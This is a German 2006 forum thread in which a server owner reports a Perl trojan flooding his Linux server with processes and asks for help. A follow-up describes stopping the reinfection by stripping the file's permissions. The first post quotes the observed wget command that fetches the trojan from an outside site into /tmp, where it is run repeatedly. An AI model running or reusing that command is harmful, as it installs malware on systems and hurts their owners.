Trojaner-Board

Trojaner-Board (https://www.trojaner-board.de/)
-   Plagegeister aller Art und deren Bekämpfung (https://www.trojaner-board.de/plagegeister-aller-art-deren-bekaempfung/)
-   -   riesen Problem Trojaner auf Linux Server (https://www.trojaner-board.de/27112-riesen-problem-trojaner-linux-server.html)

bjt 24.02.2006 10:40

riesen Problem Trojaner auf Linux Server
 
Hi,

ich habe foglendes Problem seit gestern 15 Uhr wurde der Server immer langsamer weil ungefähr 100 dieser Prozesse "perl /tmp/.sql.err.3913" liefen.

Diese Datei .sql.err.3913 existiert und ist ein Trojaner. Wenn ich die Datei lösche und alle "perl /tmp/.sql.err.3913" Prozesse kille wird über die /usr/sbin/httpd ein wget befehl gestartet der wie folgt aussieht:

DEN `LINK NICHT ANKLICKEN!!!!!!!!!!!

sh -c wget http://www.pivadesign.com.br/rc/linuxdaybot.txt -O /tmp/.sql.err.3913 ...

DEN `LINK NICHT ANKLICKEN!!!!!!!!!!!

Dieser Prozess hat als Überprozess die /usr/sbín/httpd

so dieser tolle prozess oben lädt die datei linuxdaybot.txt herunter. Ich habe mit meinem Top gesicherten windows pc mal diese adresse aufgerufen und sofort hat Der Antivirus ihn erkannnt und unschädlich gemacht er sagte es ist ein Trojaner. Der Befehl da oben lädt die Datei runter und verschiebt sie nach /tmp/.sql.err.3913 wo sie so alle 5 min. erneut ausgeführt wird. In der txt Datei steht perl Quellcode drin

Die Seite http://www.pivadesign.com.br gibts da kommt man auf ne brasilianische webdesign seite. Ich könnte ausrasten wieso hat einer so ne Datei auf seinem Webspace liegen und wie kann ich den Melden das der nen Trojaner auf seinem Server hat den mein Server andauernd runterlädt.

Ich bin total ratlos was soll ich jetzt machen?

Anm.
-----------------------
Aktive Links editiert!

Gruß Cidre
Admin TB

bjt 24.02.2006 10:59

*lol*

jetzt habe ich der runtergeladenen Datei im temp Ordner mal alle rechte entzogen dann die restlichen Prozesse gekillt und siehe da es kommt kein wget befehl mehr und datei wird auch nicht mehr ausgeführt

aber schön ist das trotzdem nicht

angenommen ich würde datei wieder aus dem temp verzeichnnis entfernen gehe ich mal davon aus der spaß dann wieder von vorn losgeht


Alle Zeitangaben in WEZ +1. Es ist jetzt 11:16 Uhr.

Copyright ©2000-2025, Trojaner-Board


Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131